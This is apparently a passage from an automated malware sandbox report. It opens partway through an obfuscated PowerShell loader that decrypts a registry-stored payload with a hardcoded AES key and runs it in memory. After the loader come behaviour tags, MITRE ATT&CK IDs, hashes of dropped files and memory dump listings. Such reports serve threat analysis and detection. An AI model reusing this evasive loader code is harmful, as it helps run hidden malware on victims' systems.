{exit};$hlRcm = [Microsoft.Win32.Registry]::$idJwa.$eWmVF($skMlQ).$YFzpY($pWXap);$NJeeA=[string[]]$hlRcm.Split('\');$OffIR=eSpTb(CFVyh([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NJeeA[1])));XUxPX $OffIR (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dTXkT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NJeeA[0]);$JwIck = New-Object System.Security.Cryptography.AesManaged;$JwIck.Mode = [System.Security.Cryptography.CipherMode]::CBC;$JwIck.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$JwIck.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GgEBZeptozY62jAkTo+jN3b4xtsDXwxbnOTUogcAvBw=');$JwIck.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ev1lAkhwUvUJQwgybsyCjA==');$tFvyD = $JwIck.('rotpyrceDetaerC'[-1..-15] -join '')();$dTXkT = $tFvyD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dTXkT, 0, $dTXkT.Length);$tFvyD.Dispose();$JwIck.Dispose();$gzRJf = New-Object System.IO.MemoryStream(, $dTXkT);$erjBR = New-Object System.IO.MemoryStream;$YTJEq = New-Object System.IO.Compression.GZipStream($gzRJf, [IO.Compression.CompressionMode]::$skMlQ1);$YTJEq.$OfZFd($erjBR);$YTJEq.Dispose();$gzRJf.Dispose();$erjBR.Dispose();$dTXkT = $erjBR.ToArray();$rDmKa = $YkTtg | IEX;$swWug = $rDmKa::$skMlQ2($dTXkT);$IzDHJ = $swWug.EntryPoint;$IzDHJ.$skMlQ0($null, (, [string[]] ($Tmohh)))
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\95659a76-330e-48b4-8630-323a0b583ae3.bat

Filesize
12.6MB

MD5
126fae8fc1e81682b4f7395b1d78b60e

SHA1
455103a9ea6636a83d2955d49bcc6c4f87ae0b41

SHA256
fb3bf34a441224c83ba1323e502dc27160d5ec2014d921ae476c38e8d65e0d5c

SHA512
245344134db22835adc7d3c4daabe3fe01a9e79fcd44f6cded4cbbf298217d2b0ecc894a9740bb9f7b4c656409ec88f46f3c5c09d28757728062c4b93db0baf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\95659a76-330e-48b4-8630-323a0b583ae3.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\95659a76-330e-48b4-8630-323a0b583ae3.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1tnbhykw.xdr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll

Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/64-263-0x00000248188B0000-0x00000248188D7000-memory.dmp

Filesize
156KB

Download
memory/64-313-0x00000248188B0000-0x00000248188D7000-memory.dmp

Filesize
156KB

Download
memory/64-264-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/384-248-0x000001E7B5010000-0x000001E7B5037000-memory.dmp

Filesize
156KB

Download
memory/384-307-0x000001E7B5010000-0x000001E7B5037000-memory.dmp

Filesize
156KB

Download
memory/384-250-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/520-255-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/520-310-0x000002162B0D0000-0x000002162B0F7000-memory.dmp

Filesize
156KB

Download
memory/520-254-0x000002162B0D0000-0x000002162B0F7000-memory.dmp

Filesize
156KB

Download
memory/612-242-0x000002BF0D430000-0x000002BF0D457000-memory.dmp

Filesize
156KB

Download
memory/612-234-0x000002BF0D400000-0x000002BF0D421000-memory.dmp

Filesize
132KB

Download
memory/612-235-0x000002BF0D430000-0x000002BF0D457000-memory.dmp

Filesize
156KB

Download
memory/612-237-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/672-245-0x0000014AD6070000-0x0000014AD6097000-memory.dmp

Filesize
156KB

Download
memory/672-241-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/672-238-0x0000014AD6070000-0x0000014AD6097000-memory.dmp

Filesize
156KB

Download
memory/740-258-0x000001DBD7F30000-0x000001DBD7F57000-memory.dmp

Filesize
156KB

Download
memory/740-259-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/740-312-0x000001DBD7F30000-0x000001DBD7F57000-memory.dmp

Filesize
156KB

Download
memory/968-247-0x00000159A5850000-0x00000159A5877000-memory.dmp

Filesize
156KB

Download
memory/968-249-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/1076-268-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/1076-266-0x000001DEF4FC0000-0x000001DEF4FE7000-memory.dmp

Filesize
156KB

Download
memory/1076-314-0x000001DEF4FC0000-0x000001DEF4FE7000-memory.dmp

Filesize
156KB

Download
memory/1088-315-0x000002B9E97C0000-0x000002B9E97E7000-memory.dmp

Filesize
156KB

Download
memory/1088-269-0x000002B9E97C0000-0x000002B9E97E7000-memory.dmp

Filesize
156KB

Download
memory/1088-271-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/1160-317-0x0000017ECCDD0000-0x0000017ECCDF7000-memory.dmp

Filesize
156KB

Download
memory/1160-277-0x00007FF91D2B0000-0x00007FF91D2C0000-memory.dmp

Filesize
64KB

Download
memory/1160-275-0x0000017ECCDD0000-0x0000017ECCDF7000-memory.dmp

Filesize
156KB

Download
memory/1260-319-0x000002104AB00000-0x000002104AB27000-memory.dmp

Filesize
156KB

Download
memory/1308-322-0x000001E0C8440000-0x000001E0C8467000-memory.dmp

Filesize
156KB

Download
memory/1324-326-0x0000022168F30000-0x0000022168F57000-memory.dmp

Filesize
156KB

Download
memory/1340-331-0x000001E853860000-0x000001E853887000-memory.dmp

Filesize
156KB

Download
memory/1360-336-0x0000020D89000000-0x0000020D89027000-memory.dmp

Filesize
156KB

Download
memory/1412-340-0x000001FBD3930000-0x000001FBD3957000-memory.dmp

Filesize
156KB

Download
memory/1528-345-0x000001CF639C0000-0x000001CF639E7000-memory.dmp

Filesize
156KB

Download
memory/2352-220-0x0000027EB5DB0000-0x0000027EB5DC0000-memory.dmp

Filesize
64KB

Download
memory/2352-218-0x0000027EB5DB0000-0x0000027EB5DC0000-memory.dmp

Filesize
64KB

Download
memory/2816-167-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2816-165-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2908-161-0x00007FF95C170000-0x00007FF95C22E000-memory.dmp

Filesize
760KB

Download
memory/2908-158-0x0000023E6BD50000-0x0000023E6BD60000-memory.dmp

Filesize
64KB

Download
memory/2908-150-0x0000023E6C430000-0x0000023E6C452000-memory.dmp

Filesize
136KB

Download
memory/2908-159-0x0000023E6BD50000-0x0000023E6BD60000-memory.dmp

Filesize
64KB

Download
memory/2908-156-0x0000023E6BD50000-0x0000023E6BD60000-memory.dmp

Filesize
64KB

Download
memory/2908-155-0x0000023E6BD50000-0x0000023E6BD60000-memory.dmp

Filesize
64KB

Download
memory/2908-160-0x00007FF95D230000-0x00007FF95D425000-memory.dmp

Filesize
2.0MB

Download
memory/2908-157-0x0000023E6BD50000-0x0000023E6BD60000-memory.dmp

Filesize
64KB

Download
memory/2908-163-0x00007FF95D230000-0x00007FF95D425000-memory.dmp

Filesize
2.0MB

Download
memory/2908-154-0x0000023E6BD50000-0x0000023E6BD60000-memory.dmp

Filesize
64KB

Download
memory/3048-203-0x0000013680330000-0x00000136804F2000-memory.dmp

Filesize
1.8MB

Download
memory/3048-213-0x000001367FFE0000-0x000001368001C000-memory.dmp

Filesize
240KB

Download
memory/3048-201-0x000001367FF90000-0x000001367FFE0000-memory.dmp

Filesize
320KB

Download
memory/3048-215-0x00007FF95C170000-0x00007FF95C22E000-memory.dmp

Filesize
760KB

Download
memory/3048-202-0x00000136800A0000-0x0000013680152000-memory.dmp

Filesize
712KB

Download
memory/3048-191-0x00007FF95D230000-0x00007FF95D425000-memory.dmp

Filesize
2.0MB

Download
memory/3048-298-0x000001367FF60000-0x000001367FF72000-memory.dmp

Filesize
72KB

Download
memory/3048-193-0x000001367E4E0000-0x000001367E4F0000-memory.dmp

Filesize
64KB

Download
memory/3048-214-0x00007FF95D230000-0x00007FF95D425000-memory.dmp

Filesize
2.0MB

Download
memory/3048-192-0x00007FF95C170000-0x00007FF95C22E000-memory.dmp

Filesize
760KB

Download
memory/3048-189-0x000001367E4E0000-0x000001367E4F0000-memory.dmp

Filesize
64KB

Download
memory/3048-194-0x00007FF95D230000-0x00007FF95D425000-memory.dmp

Filesize
2.0MB

Download
memory/3048-190-0x000001367E4E0000-0x000001367E4F0000-memory.dmp

Filesize
64KB

Download
memory/3496-219-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/3496-223-0x00007FF95D230000-0x00007FF95D425000-memory.dmp

Filesize
2.0MB

Download
memory/3496-231-0x00007FF95C170000-0x00007FF95C22E000-memory.dmp

Filesize
760KB

Download
memory/3496-232-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/3496-216-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4416-134-0x00000217F94F0000-0x00000217F9500000-memory.dmp

Filesize
64KB

Download
memory/4416-141-0x00000217F94F0000-0x00000217F9500000-memory.dmp

Filesize
64KB

Download
memory/4416-133-0x00000217F7820000-0x00000217F7826000-memory.dmp

Filesize
24KB

Download